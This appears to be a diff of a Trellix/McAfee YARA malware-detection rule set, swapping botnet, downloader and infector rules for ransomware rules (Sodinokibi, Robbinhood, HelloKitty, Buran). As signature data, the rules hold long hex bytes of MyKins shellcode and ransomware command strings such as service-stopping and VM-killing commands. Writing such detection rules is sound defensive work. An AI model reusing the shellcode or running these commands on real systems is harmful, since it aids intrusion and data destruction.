+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and pe.imphash ( ) == "672b84df309666b9d7d2bc8cc058e4c2" and all of ( $y* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE
+rule TRELLIX_ARC_Sodinokobi : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect RTF/Docs files created by MsWordExploit Builder"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "6c4c091b-5fce-583a-bc17-31830251892c"
+		description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future."
+		author = "McAfee ATR team"
+		id = "dd05ce31-9699-50a9-944c-5883340791af"
 		date = "2025-06-01"
-		modified = "2020-08-14"
+		modified = "2025-03-18"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_MsWordExploit_DOC.yar#L1-L24"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L32-L53"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d"
+		logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2"
 		score = 75
-		quality = 68
-		tags = "MALDOC, FILE"
-		malware_type = "maldoc"
-		malware_family = "Maldoc:W32/MSwordExploit"
+		quality = 70
+		tags = "RANSOMWARE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Sodinokibi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		version = "1.0"
 
 	strings:
-		$s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D }
-		$s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii
+		$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
+		$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }
 
 	condition:
-		uint16( 0 ) == 0x3030 and filesize < 4000KB and any of them
+		all of them
 }
-rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE
+rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the shellcode used in the MyKins Botnet"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "9dc80b27-59e2-5925-9bb7-64a54241f52b"
-		date = "2018-01-24"
+		description = "Robbinhood GoLang ransowmare"
+		author = "Christiaan Beek | McAfee ATR"
+		id = "b2654d00-330e-511e-b8f1-75aa7b57d040"
+		date = "2019-05-10"
 		modified = "2020-08-14"
-		reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_shellcode_mykins_botnet.yar#L1-L27"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_RobbinHood.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976"
+		hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e"
+		logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038"
 		score = 75
 		quality = 70
-		tags = "SHELLCODE, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "shellcode"
-		malware_family = "ShellCode:W32/MyKins"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Robbinhood"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 }
-		$b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF }
+		$s1 = ".enc_robbinhood" nocase
+		$s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
+		$s3 = "pub.key" nocase
+		$s4 = "main.EnableShadowFucks" nocase
+		$s5 = "main.EnableRecoveryFCK" nocase
+		$s6 = "main.EnableLogLaunders" nocase
+		$s7 = "main.EnableServiceFuck" nocase
+		$op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d }
+		$op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f }
+		$op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd }
 
 	condition:
-		filesize < 1KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $s* ) ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER
+rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rovnix downloader with sinkhole checks"
-		author = "Intel Security"
-		id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1"
-		date = "2025-06-01"
-		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Rovnix.yar#L1-L38"
+		description = "rule to detect Linux variant of the Hello Kitty Ransomware"
+		author = "Christiaan @ ATR"
+		id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9"
+		date = "2021-07-19"
+		modified = "2021-07-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540"
+		logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4"
 		score = 75
-		quality = 43
-		tags = "DOWNLOADER"
-		malware_type = "downloader"
-		malware_family = "Downloader:W32/Rovnix"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		Rule_Version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:Linux/HelloKitty"
+		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
+		hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed"
 
 	strings:
-		$sink1 = "control"
-		$sink2 = "sink"
-		$sink3 = "hole"
-		$sink4 = "dynadot"
-		$sink5 = "block"
-		$sink6 = "malw"
-		$sink7 = "anti"
-		$sink8 = "googl"
-		$sink9 = "hack"
-		$sink10 = "trojan"
-		$sink11 = "abuse"
-		$sink12 = "virus"
-		$sink13 = "black"
-		$sink14 = "spam"
-		$boot = "BOOTKIT_DLL.dll"
-		$mz = { 4D 5A }
+		$v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii
+		$v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii
+		$v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii
+		$v4 = "error encrypt: %s rename back:%s" fullword ascii
+		$v5 = "esxcli vm process list" fullword ascii
+		$v6 = "Total VM run on host:" fullword ascii
+		$v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii
+		$v8 = "Error open %s in try_lock_exclusively" fullword ascii
+		$v9 = "Mode:%d  Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii
+		$v10 = "pthread_cond_signal() error" fullword ascii
+		$v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii
 
 	condition:
-		$mz in ( 0 .. 2 ) and all of ( $sink* ) and $boot
+		( uint16( 0 ) == 0x457f and filesize < 200KB and ( 8 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE
+rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Triggers on old and new variants of W32/NionSpy file infector"
-		author = "Trellix ARC Team"
-		id = "86051ef8-a18b-553c-b06c-490f8d6df5cf"
-		date = "2025-06-01"
+		description = "Rule to detect Buran ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2"
+		date = "2019-11-05"
 		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_NionSpy.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Buran.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742"
+		logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4"
 		score = 75
 		quality = 70
-		tags = "FILEINFECTOR, FILE"
-		malware_type = "fileinfector"
-		malware_family = "FileInfector:W32/NionSpy"
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Buran"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
-		$variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
-		$variant2013_string = "%s?cstorage=shell&comp=%s"
+		$s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 }
+		$s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 }
+		$s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 }
+		$s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 }
